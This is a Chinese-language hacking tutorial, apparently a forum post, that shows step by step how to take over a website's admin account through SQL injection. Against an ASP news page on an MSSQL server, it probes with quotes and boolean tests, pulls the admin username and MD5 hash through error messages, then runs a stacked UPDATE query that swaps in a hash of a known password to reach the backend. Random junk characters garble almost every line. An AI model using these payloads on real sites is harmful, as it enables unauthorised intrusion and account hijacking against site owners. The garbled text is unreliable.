经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。6 I3 Y3 a% j8 f, h4 U! y9 H7 v" K
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
" x. `2 O2 j g- _/ ], p r, |3 T- }测试如下:
/ p8 Z# l( k' U9 C* lhttp://www.tmdsb.com/news.asp?id=1213 B: z" g$ Z- Q) }' r% ~* T
在地址后输入单引号,显示
9 ?; q2 M9 D4 T/ A0 X0 dMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’4 W* o3 D* w) Z& \+ q& }
字符串 ’’’ 之前有未闭合的引号
/ r5 Z; p- B, ~5 s4 |/news/tmdws.asp,行63
8 T3 \; b2 D( E6 c/ x" `" R说明没有过滤单引号且数据库是MSSQL. |( E* T3 R4 X$ B$ P
and 1=1正常。and 1=2出错。肯定存在注入
0 J7 X/ N/ k l接着输入9 L/ t4 r1 U: u* u
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
% _& T3 r! ]( T9 P. K# w* S" v得到帐号为:admin
0 F+ H1 |0 W6 Q1 S8 \http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)" d) I1 N0 I8 g% O4 O: @
得到密码为:a4716077c2ba075c% [# C. p* o% V* S/ r# f5 b# t
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
. e, E/ d: H0 h, W$ O! e命令如下 :3 y5 L$ c8 C8 l
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
, e/ V$ y: t% q" N3 s0 ]3 [这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |